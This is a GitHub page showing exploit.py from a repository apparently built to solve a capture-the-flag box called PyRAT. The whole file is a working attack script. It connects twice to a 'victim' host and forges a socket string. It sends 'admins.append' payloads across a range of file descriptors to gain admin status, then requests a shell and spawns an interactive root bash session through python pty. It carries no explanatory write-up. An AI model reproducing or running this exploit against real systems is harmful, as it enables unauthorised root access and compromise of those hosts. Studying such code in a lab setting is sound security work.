pyrat-ctf-exploit/exploit.py at main · bayazid-bit/pyrat-ctf-exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138


__author__  = "bayazid"
__github__ = "bayazid-bit"
__email__ = "bayazid.mtu@gmail.com"


### Try this in end of 'reverse_sock' fountion it exploit not works
### text = f"<socket.socket fd=, family=2, type=0, proto=0, {localaddr}, {remoteaddr}>"
### exaple : return text = f"<socket.socket fd=, family=2, type=0, proto=0, {localaddr}, {remoteaddr}>"


import socket
import re
import sys
import argparse
from threading import Thread


def reverse_sock( client_socket:str ) -> str:

    text = client_socket
    rap = r"raddr=\('(\d{1,3}\.){3}\d{1,3}',\s\d{1,5}\)"
    lap =r"laddr=\('(\d{1,3}\.){3}\d{1,3}',\s\d{1,5}\)"

    localaddr = re.search(rap, text).group().replace('raddr','laddr')
    remoteaddr = re.search(lap , text).group().replace('laddr','raddr')

    text = f"<socket.socket fd=, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, {localaddr}, {remoteaddr}>"
    return text


def angel_hits(s2:socket.socket , s1_remote_sock:str , min : int = 3, max:int = 100, ) -> None :
    for i in range(min,max):
        msg = s1_remote_sock.replace("fd=",f"fd={i}")
        payload = f"""admins.append("{msg}")""".encode()
        s2.send(payload)

        #print(payload)
        s2.recv(1024)
        #print()
    #s2.close()


def recv_data(s1:socket.socket) -> None:
    try:
            while True:
                    d = s1.recv(1024*1024)
                    print(d.decode() , end = '')
    except Exception as e :
        print(f'[!] {e}')


def shell(s1:socket.socket) -> None :
    s1.send(b'shell')
    r = s1.recv(1).decode()
    if  r == '#':
        print('done')
        print("[*]Exploit Successfull............. press Enter ")

        t = Thread(target  = lambda : recv_data(s1))
        t.daemon  = True
        t.start()

        s1.send(""" python3 -c 'import pty; pty.spawn("/bin/bash")' """.encode() )
        try:
            while True :
                    cmd = input()
                    print('\b')
                    s1.send(cmd.encode()+b"\n")
        except KeyboardInterrupt :
            print("\n[!] Exiting .......")
            s1.close()
            sys.exit()

        except Exception as e :
                print('[!]' , e)
                s1.close()
                sys.exit()
    else :
        print(r)
        s1.send(b"whoami\n")
        print(s1.recv(1024))
        print(s1.recv(1024))
        print(s1.recv(1024))


parser = argparse.ArgumentParser()
parser.add_argument("host")
parser.add_argument("port")
args = parser.parse_args()


host = args.host
port = int(args.port)


s1 = socket.socket()
s2 = socket.socket()

print('[*]Connecting to the victim ............' , end = '')
s1.connect((host, port))
s2.connect((host, port))
print('done')

print("[*]Reversing attacker's sock string ............" , end = '')
s1_sock = str(s1)
s1_remote_sock = reverse_sock(s1_sock)
print('done')

print('[*]Starting The Angel Hits ............' , end = '')
angel_hits(s2, s1_remote_sock, )
print('done')


print('[*]Try for root shell ............' , end = '')
shell(s1)